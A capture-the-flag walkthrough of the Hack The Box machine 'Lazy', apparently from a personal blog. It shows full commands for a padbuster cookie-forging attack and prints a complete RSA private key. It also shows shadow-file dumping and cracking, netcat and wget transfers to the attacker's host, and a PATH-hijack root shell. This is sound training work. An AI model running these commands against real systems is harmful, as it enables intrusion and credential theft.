Hackthebox.eu - Retired - Lazy
Recon
As always I start with a simple UP/Down scan on all TCP ports
$ nmap -T4 -p- -oX ./nmapb.xml lazy.htb
Then I convert that to HTML to make it pretty
xsltproc ./nmapb.xml -o nmapb.html
Just two ports open 22 and 80
Lets run nmap again with -A to run all the things
nmap -T4 -A -p22,80 -oX ./nmapf.xml lazy.htb
And lets convert that to HTML too
$ xsltproc ./nmapf.xml -o ./nmapf.html
Looks like openssh 6.6.1p1
And Apache 2.4.7
That is a super old version of OpenSSH.
Let's check the website
Tried logging in as admin/admin
No dice
But it did let me register a user
Homerj
Password
Got an auth cookie
Check this out.. If we try to register the same name again….
We could theoretically use this to find out some user names on the system. I tried doing a hydra attack at it but I couldn't get the syntax right for what I wanted it to do…. But I did add several hundred new users to the system :)
Exploit
After a reset. I decided to take a harder look at our cookie we got earlier.
We caught the login in burp
We can see the cookie 50xBDBlHPSA9QwFhjMtuyBF2krAvOSat
And we see in the response we are logged in as the user we created homerj
I want to test if this might be susceptible to a oracle padding attack
If we change up the cookie value and get an error back about the padding being incorrect we can use that data leak to decrypt value and encode it with something else
I just added Simpson to the end of my cookie value
And we did get a invalid padding error message back so we can use a tool called padbuster to decrypt this hopefully
https://github.com/AonCyberLabs/PadBuster you can clone the repo from here
And This blog walks you through the nuts and bolts of exactly how this attack works and give some examples of using padbuster to break the value.
$ ./padBuster.pl http://lazy.htb/login.php 50xBDBlHPSA9QwFhjMtuyBF2krAvOSat 8 -cookie auth=50xBDBlHPSA9QwFhjMtuyBF2krAvOSat -encoding 0
So here we are giving the
url to test for valid padding against http://lazy.htb/login.php
The sample of encrypted value 50xBDBlHPSA9QwFhjMtuyBF2krAvOSa
THen we give the block size the cipher is using. I'm just guessing 8, could be 16 if this doesn't work
Then we give it the cookie's value -cookie auth=50xBDBlHPSA9QwFhjMtuyBF2krAvOSat
Lasty another guess we have to assume the encoding used here are our options with padbuster
- 0: Base64 (default)
- 1: Lowercase HEX ASCII
- 2: Uppercase HEX ASCII
I guessed base64 so that is the last part -encoding 0
Part way through the decoding we have a prompt to answer
Which of the IDs we want to proceed with.. It recommended 2 so that is what I chose
Eventually we get this back
It was able to decrypt user=homerj as ASCII using padding oracle attack.
Guess what if it can decrypt it… we can modify it with this tool too.
Very similar command
$ ./padBuster.pl http://lazy.htb/login.php 50xBDBlHPSA9QwFhjMtuyBF2krAvOSat 8 -cookie auth=50xBDBlHPSA9QwFhjMtuyBF2krAvOSat -encoding 0 -plaintext user=admin
We just need to add the plaintext of what we want the value to be in this case user=admin
So just placing -plaintext user=admin at the end of the previous command will do that for us
Eventually we get this back
+] Encrypted value is: BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA
I'm going to just use the cookie editor extension I have loaded in firefox to change this value
Old value
Here is the new value
I'll hit save and reload the page
Bingo we got in as admin
And more importantly than that we get their SSH key
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAqIkk7+JFhRPDbqA0D1ZB4HxS7Nn6GuEruDvTMS1EBZrUMa9r
upUZr2C4LVqd6+gm4WBDJj/CzAi+g9KxVGNAoT+Exqj0Z2a8Xpz7z42PmvK0Bgkk
3mwB6xmZBr968w9pznUio1GEf9i134x9g190yNa8XXdQ195cX6ysv1tPt/DXaYVq
OOheHpZZNZLTwh+aotEX34DnZLv97sdXZQ7km9qXMf7bqAuMop/ozavqz6ylzUHV
YKFPW3R7UwbEbkH+3GPf9IGOZSx710jTd1JV71t4avC5NNqHxUhZilni39jm/EXi
o1AC4ZKC1FqA/4YjQs4HtKv1AxwAFu7IYUeQ6QIDAQABAoIBAA79a7ieUnqcoGRF
gXvfuypBRIrmdFVRs7bGM2mLUiKBe+ATbyyAOHGd06PNDIC//D1Nd4t+XlARcwh8
g+MylLwCz0dwHZTY0WZE5iy2tZAdiB+FTq8twhnsA+1SuJfHxixjxLnr9TH9z2db
sootwlBesRBLHXilwWeNDyxR7cw5TauRBeXIzwG+pW8nBQt62/4ph/jNYabWZtji
jzSgHJIpmTO6OVERffcwK5TW/J5bHAys97OJVEQ7wc3rOVJS4I/PDFcteQKf9Mcb
+JHc6E2V2NHk00DPZmPEeqH9ylXsWRsirmpbMIZ/HTbnxJXKZJ8408p6Z+n/d8t5
gyoaRgECgYEA0oiSiVPb++auc5du9714TxLA5gpmaE9aaLNwEh4iLOS+Rtzp9jSp
b1auElzXPwACjKYpw709cNGV7bV8PPfBmtyNfHLeMTVf/E/jbRUO/000ZNznPnE7
SztdWk4UWPQx0lcSiShYymc1C/hvcgluKhdAi5m53MiPaNlmtORZ1sECgYEAzO61
apZQ0U629sx0OKn3YacY7bNQlXjl1bw5Lr0jkCIAGiquhUz2jpN7T+seTVPqHQbm
sClLuQ0vJEUAIcSUYOUbuqykdCbXSM3DqayNSiOSyk94Dzlh37Ah9xcCowKuBLnD
gl3dfVsRMNo0xppv4TUmq9//pe952MTf1z+7LCkCgYB2skMTo7DyC3OtfeI1UKBE
zIju6UwlYR/Syd/UhyKzdt+EKkbJ5ZTlTdRkS+2a+lF1pLUFQ2shcTh7RYffA7wm
qFQopsZ4reQI562MMYQ8EfYJK7ZAMSzB1J1kLYMxR7PTJ/4uUA4HRzrUHeQPQhvX
JTbhvfDY9kZMUc2jDN9NwQKBgQCI6VG6jAIiU/xYle9vi94CF6jH5WyI7+RdDwsE
9sezm4OF983wsKJoTo+rrODpuI5IJjwopO46C1zbVl3oMXUP5wDHjl+wWeKqeQ2n
ZehfB7UiBEWppiSFVR7b/Tt9vGSWM6Uyi5NWFGk/wghQRw1H4EKdwWECcyNsdts0
6xcZQQKBgQCB1C4QH0t6a7h5aAo/aZwJ+9JUSqsKat0E7ijmz2trYjsZPahPUsnm
+H9wn3Pf5kAt072/4N2LNuDzJeVVYiZUsDwGFDLiCbYyBVXgqtaVdHCfXwhWh1EN
pXoEbtCvgueAQmWpXVxaEiugA1eezU+bMiUmer1Qb/l1U9sNcW9DmA==
-----END RSA PRIVATE KEY-----
Let's save it to our kali box give it tighter permissions and and try to use this private key to connect to the ssh
But what about a username?
Well check out the name of the private key file
mitsos
$ ssh -i ./privkey mitsos@lazy.htb
We got our shell!!!
Let's see where we landed…
Oh there is the user hash
Let's get LinEnum.sh over to the box and see if we can find a path to escalation
On my kali box I just ran SimpleHTTPServer from the /opt/linux/linenum folder
mitsos@LazyClown:/tmp$ mkdir circusmonkey ; cd circusmonkey
mitsos@LazyClown:/tmp/circusmonkey$ wget http://10.10.14.48:88/LinEnum.sh
Gave execute rights to the script
Chmod +x ./LinEnum.sh
Didn't see anything that jumps out to me in the output.
Let's look back at the /home/mitsos folder
What is that file called backup?
Mmmkay its not a folder… but we can run it
It's an executable
Since this isn't my machine let's run it and see what it does
:)
Looks like it dumps out the shadow folder.
I saved that locally in a file called lazyshadow
Let's grab the /etc/passwd file too so we can unshadow this and feed it to john
Copied that out locally to a file named lazypasswd
Then run unshadow to format this list in a format john likes
$ sudo /usr/sbin/unshadow ./lazypasswd ./lazyshadow > ./lazyunshadow
$ sudo john --wordlist=/home/circusmonkey/rockyou.txt ./lazyunshadow
I literally let this run all night and it never got the hashes…
Let's take a look at that executable.
I used netcat to copy it over locally
On my local box
$ nc -lnvp 4444 > backup
On Lazy
nc 10.10.14.48 4444 < /home/mitsos/backup
This probably wasn't necessary but I wanted to check it out offline
I used the string command to see if there are any strings in the executable that we can read
Looks like it does exactly what we thought. It does it cats the /etc/shadow file.
Let's check the permissions on this file again
Its owned by root
-rwsrwsr-x
If you not familiar with this syntax here is a great resource
Basically this can be divided into three sections, three groups of three indicating who has what rights to the file
The first grouping is the rights of the owner of the file
The next grouping is for the members of a group that have permissions on the file
The final grouping is for others, meaning for any user that is not the owner or a member of the group
Normally you will see either a X, R or W in the groupings which mean
X = Execute - This user or group can execute the file
R = Read - this users or can read the file
W = Write - This user or group can write to this file, to change or modify it
In our example here we see another character added to the normal options you would see. This example has a S.
S is Setuid or Setgid ( depending on if its set at owner level or group level)
What it means to us is if the S is set on an executable, whoever can run the program, when they execute it the program will run as the owner of the file. So in this case if anyone can run this file it runs as root.
-rwsrwsr-x
-rws The first dash here just indicates if this is a directory or link, if it were there would be a d or l in this place. So we will just ignore that
rws - Owner Can read,write and execute this file
rws - Group members can read,write and execute
r-x - Others can Read and Execute
So we are not root so we can ignore the first 3 characters in the permissions
We are also not members of the group root so we can ignore the second three characters
We are however an other, we are a user on this system.
So we can read and execute… and since the Setuid is present. When we run it we run it as root
Which is why when we run it it can cat out the /etc/shadow which we as mitsos doesn't have access to.
However we can't modify the file directly since we don't have write permissions.
Ok back to the interesting string we were able to pull from the executable
cat /etc/shadow
What we might do if we were able to manipulate the file itself is just change it to cat /roor/root.txt to get our root hash.
But what we can do here is take advantage of the the relative call to cat
We can simply change what cat means to the system.
If they had used /bin/cat /etc/shadow then this wouldn't work but since we can control the environment variables we can hijack cat to be something else.
The reason we can call cat without the absolute path is because we have defined /bin in our path environment variable. We can check our environment variables by typing env
This is pretty standard on all Operating systems not just LInux windows also has an environment variable like this so we can run programs from \system32 without having to type the absolute path.
So we can change our path to include a folder we have ownership of and give it a cat that does something else instead of just reading out a file.
Here is another write up on this attack method
So we need create a new cat that launches a shell as the root user
Moving back to the /tmp/circusmonkey folder we created earlier
cd /tmp/circusmonkey/
We will create a new cat file here that just calls /bin/bash
echo "/bin/sh" > cat
Now we need to change the permissions here to give it execute rights for all users
chmod 777 ./cat
Now we just need to add this /tmp/circusmonkey to the path environment variable
export PATH=/tmp/circusmonkey:$PATH
*** you can see I can't spell my own name here in this output*****
Now we just need to execute the backup executable again and hopefully it will us our newly created cat to give us root shell
I am root
Now we just need to get our hash.. Remember we screwed with the path environment variable and now we will have to use the absolute path for cat or we will just call our shell again.
# /bin/cat /root/root.txt
990*************************
Comments
Post a Comment